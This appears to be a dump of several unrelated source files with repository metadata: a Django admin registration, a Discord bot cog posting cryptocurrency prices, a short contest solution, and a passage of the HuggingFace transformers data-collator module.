912fa52714064da3a53bcfaa300598cb017f9470 | 156 | py | Python | profiles_api/admin.py | law187/profile-rest-api | ec4e3ce44c73d2f7081435a2626543495ec69e8d | ["MIT"] | null | null | null | profiles_api/admin.py | law187/profile-rest-api | ec4e3ce44c73d2f7081435a2626543495ec69e8d | ["MIT"] | null | null | null | profiles_api/admin.py | law187/profile-rest-api | ec4e3ce44c73d2f7081435a2626543495ec69e8d | ["MIT"] | null | null | null
from django.contrib import admin
from profiles_api import models
admin.site.register(models.UserProfile)
admin.site.register(models.ProfuleFeedItem)  # sic: "ProfuleFeedItem" matches the (likely misspelled) model name in models.py
22.285714 | 44 | 0.820513 | 20 | 156 | 6.35 | 0.6 | 0.141732 | 0.267717 | 0.362205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108974 | 156 | 6 | 45 | 26 | 0.913669 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6
9149f6229814912ec65979ab5700e04902706492 | 42 | py | Python | seamseg/config/__init__.py | gladcolor/seamseg | 9e6c7e2828f32b311a7b0c16b279ac194e8aaf94 | ["BSD-3-Clause"] | 282 | 2019-06-07T11:37:01.000Z | 2022-03-19T05:43:02.000Z | seamseg/config/__init__.py | gladcolor/seamseg | 9e6c7e2828f32b311a7b0c16b279ac194e8aaf94 | ["BSD-3-Clause"] | 32 | 2019-07-02T10:39:03.000Z | 2022-03-10T14:10:13.000Z | seamseg/config/__init__.py | gladcolor/seamseg | 9e6c7e2828f32b311a7b0c16b279ac194e8aaf94 | ["BSD-3-Clause"] | 56 | 2019-07-24T02:31:37.000Z | 2022-01-07T16:19:50.000Z
from .config import load_config, DEFAULTS
21 | 41 | 0.833333 | 6 | 42 | 5.666667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119048 | 42 | 1 | 42 | 42 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6
e67d12c5acfe6a9870df25c57f2a3b06c367d853 | 3,179 | py | Python | zeenode-selfbot/zeenode/cogs/currency.py | PercyTheB/zeenode-fixed | d91750a8ef66ae92053aab16e7bc57457ddf71d4 | ["MIT"] | null | null | null | zeenode-selfbot/zeenode/cogs/currency.py | PercyTheB/zeenode-fixed | d91750a8ef66ae92053aab16e7bc57457ddf71d4 | ["MIT"] | null | null | null | zeenode-selfbot/zeenode/cogs/currency.py | PercyTheB/zeenode-fixed | d91750a8ef66ae92053aab16e7bc57457ddf71d4 | ["MIT"] | null | null | null
import discord  # referenced only by the commented-out embed snippets below
import requests
from discord.ext import commands as zeenode
class currency(zeenode.Cog):
def __init__(self, bot):
self.bot = bot
@zeenode.command()
async def btc(self, ctx):
await ctx.message.delete()
r = requests.get(
"https://min-api.cryptocompare.com/data/price?fsym=BTC&tsyms=USD,EUR"
)
kekistan = r.json()
eur = kekistan["EUR"]
usd = kekistan["USD"]
await ctx.send(
f"""
Bitcoin:
EUR: {str(eur)}€\nUSD: {str(usd)}$
"""
        )
@zeenode.command()
async def xmr(self, ctx):
await ctx.message.delete()
r = requests.get(
"https://min-api.cryptocompare.com/data/price?fsym=XMR&tsyms=USD,EUR"
)
kekistan = r.json()
eur = kekistan["EUR"]
usd = kekistan["USD"]
await ctx.send(
f"""
Monero:
EUR: {str(eur)}€\nUSD: {str(usd)}$
"""
)
@zeenode.command()
async def xrp(self, ctx):
await ctx.message.delete()
r = requests.get(
"https://min-api.cryptocompare.com/data/price?fsym=XRP&tsyms=USD,EUR"
)
kekistan = r.json()
eur = kekistan["EUR"]
usd = kekistan["USD"]
# embedic = discord.Embed(description=f"EUR: {str(eur)}€\nUSD: {str(usd)}$")
# embedic.set_author(
# name="Ripple",
# icon_url="https://cdn.freebiesupply.com/logos/large/2x/ripple-2-logo-png-transparent.png",
# )
# await ctx.send(embed=embedic)
await ctx.send(
f"""
Ripple:
EUR: {str(eur)}€\nUSD: {str(usd)}$
"""
)
@zeenode.command()
async def doge(self, ctx):
await ctx.message.delete()
r = requests.get(
"https://min-api.cryptocompare.com/data/price?fsym=DOGE&tsyms=USD,EUR"
)
kekistan = r.json()
eur = kekistan["EUR"]
usd = kekistan["USD"]
# embedic = discord.Embed(description=f"EUR: {str(eur)}€\nUSD: {str(usd)}$")
# embedic.set_author(
# name="Dogecoin",
# icon_url="https://cdn.coindoo.com/2019/10/dogecoin-logo.png",
# )
# await ctx.send(embed=embedic)
await ctx.send(
f"""
Dogecoin:
EUR: {str(eur)}€\nUSD: {str(usd)}$
"""
)
@zeenode.command()
async def eth(self, ctx):
await ctx.message.delete()
r = requests.get(
"https://min-api.cryptocompare.com/data/price?fsym=ETH&tsyms=USD,EUR"
)
kekistan = r.json()
eur = kekistan["EUR"]
usd = kekistan["USD"]
# embedic = discord.Embed(description=f"EUR: {str(eur)}€\nUSD: {str(usd)}$")
# embedic.set_author(
# name="Ethereum",
# icon_url="https://cdn.freebiesupply.com/logos/large/2x/ethereum-1-logo-png-transparent.png",
# )
# await ctx.send(embed=embedic)
await ctx.send(
f"""
Ethereum:
EUR: {str(eur)}€\nUSD: {str(usd)}$
"""
)
def setup(bot):
bot.add_cog(currency(bot))
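# The five commands above differ only in the coin symbol and display name.
# A deduplicated sketch (our suggestion, not part of the original cog; the
# helper name send_price is hypothetical):
PRICE_URL = "https://min-api.cryptocompare.com/data/price?fsym={}&tsyms=USD,EUR"

async def send_price(ctx, symbol, display_name):
    # Delete the invoking message, fetch the quote, and post it as plain text.
    await ctx.message.delete()
    quote = requests.get(PRICE_URL.format(symbol)).json()
    await ctx.send(f"{display_name}:\nEUR: {quote['EUR']}€\nUSD: {quote['USD']}$")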
28.9 | 107 | 0.519031 | 373 | 3,179 | 4.41555 | 0.201072 | 0.063145 | 0.058288 | 0.048573 | 0.806922 | 0.806922 | 0.806922 | 0.794778 | 0.794778 | 0.742562 | 0 | 0.0046 | 0.316137 | 3,179 | 109 | 108 | 29.165138 | 0.74931 | 0.21988 | 0 | 0.609756 | 0 | 0.060976 | 0.251276 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02439 | false | 0 | 0.02439 | 0 | 0.060976 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6
e6a02a9ce74eaea3e1660226c358b4f06e4a208d | 82 | py | Python | abc/abc082/abc082a.py | c-yan/atcoder | 940e49d576e6a2d734288fadaf368e486480a948 | ["MIT"] | 1 | 2019-08-21T00:49:34.000Z | 2019-08-21T00:49:34.000Z | abc/abc082/abc082a.py | c-yan/atcoder | 940e49d576e6a2d734288fadaf368e486480a948 | ["MIT"] | null | null | null | abc/abc082/abc082a.py | c-yan/atcoder | 940e49d576e6a2d734288fadaf368e486480a948 | ["MIT"] | null | null | null
from math import ceil
a, b = map(int, input().split())
print(ceil((a + b) / 2))
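# Note (ours): math.ceil((a + b) / 2) goes through float division, which is fine
# for this problem's small inputs but can lose precision for very large
# integers; an exact integer-only equivalent is ceiling division:
# print((a + b + 1) // 2)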
13.666667 | 32 | 0.585366 | 15 | 82 | 3.2 | 0.8 | 0.208333 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015152 | 0.195122 | 82 | 5 | 33 | 16.4 | 0.712121 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6
fc1dd25eb3ea83bd5c54aef0cbd8f86b73abd1e8 | 76,639 | py | Python | src/transformers/data/data_collator.py | manuelciosici/transformers | c33f6046c3dab8f41bedf893404e6469dea3bce8 | ["Apache-2.0"] | 8,028 | 2018-11-05T15:19:44.000Z | 2019-07-16T09:14:59.000Z | src/transformers/data/data_collator.py | ymwangg/transformers | 4a419d4995111c22d6842ee1bcd2d3f500150845 | ["Apache-2.0"] | 731 | 2018-11-05T21:35:52.000Z | 2019-07-16T09:51:26.000Z | src/transformers/data/data_collator.py | ymwangg/transformers | 4a419d4995111c22d6842ee1bcd2d3f500150845 | ["Apache-2.0"] | 2,106 | 2018-11-05T15:29:15.000Z | 2019-07-16T08:51:57.000Z
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
import warnings
from collections.abc import Mapping
from dataclasses import dataclass
from typing import Any, Callable, Dict, List, NewType, Optional, Tuple, Union
from ..models.bert import BertTokenizer, BertTokenizerFast
from ..tokenization_utils_base import PreTrainedTokenizerBase
from ..utils import PaddingStrategy
InputDataClass = NewType("InputDataClass", Any)
"""
A DataCollator is a function that takes a list of samples from a Dataset and collates them into a batch, as a dictionary
of PyTorch/TensorFlow tensors or NumPy arrays.
"""
DataCollator = NewType("DataCollator", Callable[[List[InputDataClass]], Dict[str, Any]])
class DataCollatorMixin:
def __call__(self, features, return_tensors=None):
if return_tensors is None:
return_tensors = self.return_tensors
if return_tensors == "tf":
return self.tf_call(features)
elif return_tensors == "pt":
return self.torch_call(features)
elif return_tensors == "np":
return self.numpy_call(features)
else:
raise ValueError(f"Framework '{return_tensors}' not recognized!")
def default_data_collator(features: List[InputDataClass], return_tensors="pt") -> Dict[str, Any]:
"""
Very simple data collator that simply collates batches of dict-like objects and performs special handling for
potential keys named:
- `label`: handles a single value (int or float) per object
- `label_ids`: handles a list of values per object
Does not do any additional preprocessing: property names of the input object will be used as corresponding inputs
    to the model. See glue and ner for examples of how it's useful.
"""
# In this function we'll make the assumption that all `features` in the batch
# have the same attributes.
# So we will look at the first element as a proxy for what attributes exist
# on the whole batch.
if return_tensors == "pt":
return torch_default_data_collator(features)
elif return_tensors == "tf":
return tf_default_data_collator(features)
elif return_tensors == "np":
return numpy_default_data_collator(features)
@dataclass
class DefaultDataCollator(DataCollatorMixin):
"""
Very simple data collator that simply collates batches of dict-like objects and performs special handling for
potential keys named:
- `label`: handles a single value (int or float) per object
- `label_ids`: handles a list of values per object
Does not do any additional preprocessing: property names of the input object will be used as corresponding inputs
    to the model. See glue and ner for examples of how it's useful.
This is an object (like other data collators) rather than a pure function like default_data_collator. This can be
helpful if you need to set a return_tensors value at initialization.
Args:
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
return_tensors: str = "pt"
def __call__(self, features: List[Dict[str, Any]], return_tensors=None) -> Dict[str, Any]:
if return_tensors is None:
return_tensors = self.return_tensors
return default_data_collator(features, return_tensors)
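# Usage sketch (ours): dict features with an int "label" collate into a batch
# with a long "labels" tensor and the remaining columns stacked.
#
#     import torch
#     features = [{"input_ids": torch.tensor([1, 2]), "label": 0},
#                 {"input_ids": torch.tensor([3, 4]), "label": 1}]
#     batch = DefaultDataCollator()(features)
#     # batch["labels"] -> tensor([0, 1]); batch["input_ids"].shape -> (2, 2)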
def torch_default_data_collator(features: List[InputDataClass]) -> Dict[str, Any]:
import torch
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], torch.Tensor) else first["label"]
dtype = torch.long if isinstance(label, int) else torch.float
batch["labels"] = torch.tensor([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], torch.Tensor):
batch["labels"] = torch.stack([f["label_ids"] for f in features])
else:
dtype = torch.long if type(first["label_ids"][0]) is int else torch.float
batch["labels"] = torch.tensor([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([f[k] for f in features])
else:
batch[k] = torch.tensor([f[k] for f in features])
return batch
def tf_default_data_collator(features: List[InputDataClass]) -> Dict[str, Any]:
import numpy as np
import tensorflow as tf
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label_col_name = "label"
elif "label_ids" in first and first["label_ids"] is not None:
label_col_name = "label_ids"
elif "labels" in first and first["labels"] is not None:
label_col_name = "labels"
else:
label_col_name = None
if label_col_name is not None:
if isinstance(first[label_col_name], tf.Tensor):
            dtype = tf.int64 if first[label_col_name].dtype.is_integer else tf.float32  # DType.is_integer is a property, not a method
elif isinstance(first[label_col_name], np.ndarray) or isinstance(first[label_col_name], np.generic):
dtype = tf.int64 if np.issubdtype(first[label_col_name].dtype, np.integer) else tf.float32
elif isinstance(first[label_col_name], (tuple, list)):
dtype = tf.int64 if isinstance(first[label_col_name][0], int) else tf.float32
else:
dtype = tf.int64 if isinstance(first[label_col_name], int) else tf.float32
batch["labels"] = tf.convert_to_tensor([f[label_col_name] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
for k, v in first.items():
if k not in ("label", "label_ids", "labels") and v is not None and not isinstance(v, str):
if isinstance(v, (tf.Tensor, np.ndarray)):
batch[k] = tf.stack([f[k] for f in features])
else:
batch[k] = tf.convert_to_tensor([f[k] for f in features])
return batch
def numpy_default_data_collator(features: List[InputDataClass]) -> Dict[str, Any]:
import numpy as np
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], np.ndarray) else first["label"]
dtype = np.int64 if isinstance(label, int) else np.float32
batch["labels"] = np.array([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], np.ndarray):
batch["labels"] = np.stack([f["label_ids"] for f in features])
else:
dtype = np.int64 if type(first["label_ids"][0]) is int else np.float32
batch["labels"] = np.array([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, np.ndarray):
batch[k] = np.stack([f[k] for f in features])
else:
batch[k] = np.array([f[k] for f in features])
return batch
@dataclass
class DataCollatorWithPadding:
"""
Data collator that will dynamically pad the inputs received.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`):
Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
among:
- `True` or `'longest'` (default): Pad to the longest sequence in the batch (or no padding if only a single
sequence is provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum
acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'`: No padding (i.e., can output a batch with sequences of different lengths).
max_length (`int`, *optional*):
Maximum length of the returned list and optionally padding length (see above).
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
7.5 (Volta).
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
tokenizer: PreTrainedTokenizerBase
padding: Union[bool, str, PaddingStrategy] = True
max_length: Optional[int] = None
pad_to_multiple_of: Optional[int] = None
return_tensors: str = "pt"
def __call__(self, features: List[Dict[str, Any]]) -> Dict[str, Any]:
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
return_tensors=self.return_tensors,
)
if "label" in batch:
batch["labels"] = batch["label"]
del batch["label"]
if "label_ids" in batch:
batch["labels"] = batch["label_ids"]
del batch["label_ids"]
return batch
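# Usage sketch (ours; assumes the "bert-base-uncased" checkpoint is available):
#
#     from transformers import AutoTokenizer
#     tok = AutoTokenizer.from_pretrained("bert-base-uncased")
#     collator = DataCollatorWithPadding(tokenizer=tok)
#     features = [tok("short text"), tok("a somewhat longer piece of text")]
#     batch = collator(features)  # both rows padded to the longest length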
@dataclass
class DataCollatorForTokenClassification(DataCollatorMixin):
"""
Data collator that will dynamically pad the inputs received, as well as the labels.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`):
Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
among:
- `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single sequence
is provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum
acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of different
lengths).
max_length (`int`, *optional*):
Maximum length of the returned list and optionally padding length (see above).
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
7.5 (Volta).
label_pad_token_id (`int`, *optional*, defaults to -100):
            The id to use when padding the labels (-100 will be automatically ignored by PyTorch loss functions).
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
tokenizer: PreTrainedTokenizerBase
padding: Union[bool, str, PaddingStrategy] = True
max_length: Optional[int] = None
pad_to_multiple_of: Optional[int] = None
label_pad_token_id: int = -100
return_tensors: str = "pt"
def torch_call(self, features):
import torch
label_name = "label" if "label" in features[0].keys() else "labels"
labels = [feature[label_name] for feature in features] if label_name in features[0].keys() else None
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
# Conversion to tensors will fail if we have labels as they are not of the same length yet.
return_tensors="pt" if labels is None else None,
)
if labels is None:
return batch
sequence_length = torch.tensor(batch["input_ids"]).shape[1]
padding_side = self.tokenizer.padding_side
if padding_side == "right":
batch[label_name] = [
list(label) + [self.label_pad_token_id] * (sequence_length - len(label)) for label in labels
]
else:
batch[label_name] = [
[self.label_pad_token_id] * (sequence_length - len(label)) + list(label) for label in labels
]
batch = {k: torch.tensor(v, dtype=torch.int64) for k, v in batch.items()}
return batch
def tf_call(self, features):
import tensorflow as tf
label_name = "label" if "label" in features[0].keys() else "labels"
labels = [feature[label_name] for feature in features] if label_name in features[0].keys() else None
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
# Conversion to tensors will fail if we have labels as they are not of the same length yet.
return_tensors="tf" if labels is None else None,
)
if labels is None:
return batch
sequence_length = tf.convert_to_tensor(batch["input_ids"]).shape[1]
padding_side = self.tokenizer.padding_side
if padding_side == "right":
batch["labels"] = [
list(label) + [self.label_pad_token_id] * (sequence_length - len(label)) for label in labels
]
else:
batch["labels"] = [
[self.label_pad_token_id] * (sequence_length - len(label)) + list(label) for label in labels
]
batch = {k: tf.convert_to_tensor(v, dtype=tf.int64) for k, v in batch.items()}
return batch
def numpy_call(self, features):
import numpy as np
label_name = "label" if "label" in features[0].keys() else "labels"
labels = [feature[label_name] for feature in features] if label_name in features[0].keys() else None
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
# Conversion to tensors will fail if we have labels as they are not of the same length yet.
return_tensors="np" if labels is None else None,
)
if labels is None:
return batch
sequence_length = np.array(batch["input_ids"]).shape[1]
padding_side = self.tokenizer.padding_side
if padding_side == "right":
batch["labels"] = [
list(label) + [self.label_pad_token_id] * (sequence_length - len(label)) for label in labels
]
else:
batch["labels"] = [
[self.label_pad_token_id] * (sequence_length - len(label)) + list(label) for label in labels
]
batch = {k: np.array(v, dtype=np.int64) for k, v in batch.items()}
return batch
def _torch_collate_batch(examples, tokenizer, pad_to_multiple_of: Optional[int] = None):
"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""
import numpy as np
import torch
# Tensorize if necessary.
if isinstance(examples[0], (list, tuple, np.ndarray)):
examples = [torch.tensor(e, dtype=torch.long) for e in examples]
length_of_first = examples[0].size(0)
# Check if padding is necessary.
are_tensors_same_length = all(x.size(0) == length_of_first for x in examples)
if are_tensors_same_length and (pad_to_multiple_of is None or length_of_first % pad_to_multiple_of == 0):
return torch.stack(examples, dim=0)
# If yes, check if we have a `pad_token`.
if tokenizer._pad_token is None:
raise ValueError(
"You are attempting to pad samples but the tokenizer you are using"
f" ({tokenizer.__class__.__name__}) does not have a pad token."
)
# Creating the full tensor and filling it with our data.
max_length = max(x.size(0) for x in examples)
if pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
result = examples[0].new_full([len(examples), max_length], tokenizer.pad_token_id)
for i, example in enumerate(examples):
if tokenizer.padding_side == "right":
result[i, : example.shape[0]] = example
else:
result[i, -example.shape[0] :] = example
return result
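# Worked example (ours): with pad_to_multiple_of=8 and a longest example of
# length 10, max_length becomes ((10 // 8) + 1) * 8 = 16, so every row is
# padded out to 16 tokens (on the left or right, per tokenizer.padding_side).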
def _tf_collate_batch(examples, tokenizer, pad_to_multiple_of: Optional[int] = None):
    """Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""
    import numpy as np
    import tensorflow as tf
# Tensorize if necessary.
if isinstance(examples[0], (list, tuple)):
examples = [tf.convert_to_tensor(e, dtype=tf.int64) for e in examples]
# Check if padding is necessary.
length_of_first = len(examples[0])
are_tensors_same_length = all(len(x) == length_of_first for x in examples)
if are_tensors_same_length and (pad_to_multiple_of is None or length_of_first % pad_to_multiple_of == 0):
return tf.stack(examples, axis=0)
# If yes, check if we have a `pad_token`.
if tokenizer._pad_token is None:
raise ValueError(
"You are attempting to pad samples but the tokenizer you are using"
f" ({tokenizer.__class__.__name__}) does not have a pad token."
)
# Creating the full tensor and filling it with our data.
max_length = max(len(x) for x in examples)
if pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
# result = examples[0].new_full([len(examples), max_length], tokenizer.pad_token_id)
result = []
rank = tf.rank(examples[0])
paddings = np.zeros((rank, 2), dtype=np.int32)
for example in examples:
if tokenizer.padding_side == "right":
paddings[0, 1] = max_length - len(example)
else:
paddings[0, 0] = max_length - len(example)
result.append(tf.pad(example, paddings, constant_values=tokenizer.pad_token_id))
return tf.stack(result, axis=0)
def _numpy_collate_batch(examples, tokenizer, pad_to_multiple_of: Optional[int] = None):
    """Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""
    import numpy as np
# Tensorize if necessary.
if isinstance(examples[0], (list, tuple)):
examples = [np.array(e, dtype=np.int64) for e in examples]
# Check if padding is necessary.
length_of_first = len(examples[0])
are_tensors_same_length = all(len(x) == length_of_first for x in examples)
if are_tensors_same_length and (pad_to_multiple_of is None or length_of_first % pad_to_multiple_of == 0):
return np.stack(examples, axis=0)
# If yes, check if we have a `pad_token`.
if tokenizer._pad_token is None:
raise ValueError(
"You are attempting to pad samples but the tokenizer you are using"
f" ({tokenizer.__class__.__name__}) does not have a pad token."
)
# Creating the full tensor and filling it with our data.
max_length = max(len(x) for x in examples)
if pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
result = np.full(shape=(len(examples), max_length), fill_value=tokenizer.pad_token_id, dtype=examples[0].dtype)
for i, example in enumerate(examples):
if tokenizer.padding_side == "right":
result[i, : example.shape[0]] = example
else:
result[i, -example.shape[0] :] = example
return result
def tolist(x):
if isinstance(x, list):
return x
elif hasattr(x, "numpy"): # Checks for TF tensors without needing the import
x = x.numpy()
return x.tolist()
@dataclass
class DataCollatorForSeq2Seq:
"""
Data collator that will dynamically pad the inputs received, as well as the labels.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
model ([`PreTrainedModel`]):
            The model that is being trained. If set and the model has the *prepare_decoder_input_ids_from_labels*
            method, it is used to prepare the *decoder_input_ids*.
This is useful when using *label_smoothing* to avoid calculating loss twice.
padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`):
Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
among:
- `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single sequence
is provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum
acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of different
lengths).
max_length (`int`, *optional*):
Maximum length of the returned list and optionally padding length (see above).
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
7.5 (Volta).
label_pad_token_id (`int`, *optional*, defaults to -100):
The id to use when padding the labels (-100 will be automatically ignored by PyTorch loss functions).
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
tokenizer: PreTrainedTokenizerBase
model: Optional[Any] = None
padding: Union[bool, str, PaddingStrategy] = True
max_length: Optional[int] = None
pad_to_multiple_of: Optional[int] = None
label_pad_token_id: int = -100
return_tensors: str = "pt"
def __call__(self, features, return_tensors=None):
import numpy as np
if return_tensors is None:
return_tensors = self.return_tensors
labels = [feature["labels"] for feature in features] if "labels" in features[0].keys() else None
# We have to pad the labels before calling `tokenizer.pad` as this method won't pad them and needs them of the
# same length to return tensors.
if labels is not None:
max_label_length = max(len(l) for l in labels)
if self.pad_to_multiple_of is not None:
max_label_length = (
(max_label_length + self.pad_to_multiple_of - 1)
// self.pad_to_multiple_of
* self.pad_to_multiple_of
)
padding_side = self.tokenizer.padding_side
for feature in features:
remainder = [self.label_pad_token_id] * (max_label_length - len(feature["labels"]))
if isinstance(feature["labels"], list):
feature["labels"] = (
feature["labels"] + remainder if padding_side == "right" else remainder + feature["labels"]
)
elif padding_side == "right":
feature["labels"] = np.concatenate([feature["labels"], remainder]).astype(np.int64)
else:
feature["labels"] = np.concatenate([remainder, feature["labels"]]).astype(np.int64)
features = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
return_tensors=return_tensors,
)
# prepare decoder_input_ids
if (
labels is not None
and self.model is not None
and hasattr(self.model, "prepare_decoder_input_ids_from_labels")
):
decoder_input_ids = self.model.prepare_decoder_input_ids_from_labels(labels=features["labels"])
features["decoder_input_ids"] = decoder_input_ids
return features
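# Sketch of the label pre-padding above (ours): with label_pad_token_id=-100,
# right padding, and labels [[5, 6], [7]], the shorter row becomes [7, -100]
# before tokenizer.pad is called, so the batch can be tensorized; the -100
# positions are then ignored by PyTorch loss functions.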
@dataclass
class DataCollatorForLanguageModeling(DataCollatorMixin):
"""
Data collator used for language modeling. Inputs are dynamically padded to the maximum length of a batch if they
are not all of the same length.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
mlm (`bool`, *optional*, defaults to `True`):
Whether or not to use masked language modeling. If set to `False`, the labels are the same as the inputs
with the padding tokens ignored (by setting them to -100). Otherwise, the labels are -100 for non-masked
tokens and the value to predict for the masked token.
mlm_probability (`float`, *optional*, defaults to 0.15):
The probability with which to (randomly) mask tokens in the input, when `mlm` is set to `True`.
pad_to_multiple_of (`int`, *optional*):
            If set, will pad the sequence to a multiple of the provided value.
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
<Tip>
For best performance, this data collator should be used with a dataset having items that are dictionaries or
BatchEncoding, with the `"special_tokens_mask"` key, as returned by a [`PreTrainedTokenizer`] or a
[`PreTrainedTokenizerFast`] with the argument `return_special_tokens_mask=True`.
</Tip>"""
tokenizer: PreTrainedTokenizerBase
mlm: bool = True
mlm_probability: float = 0.15
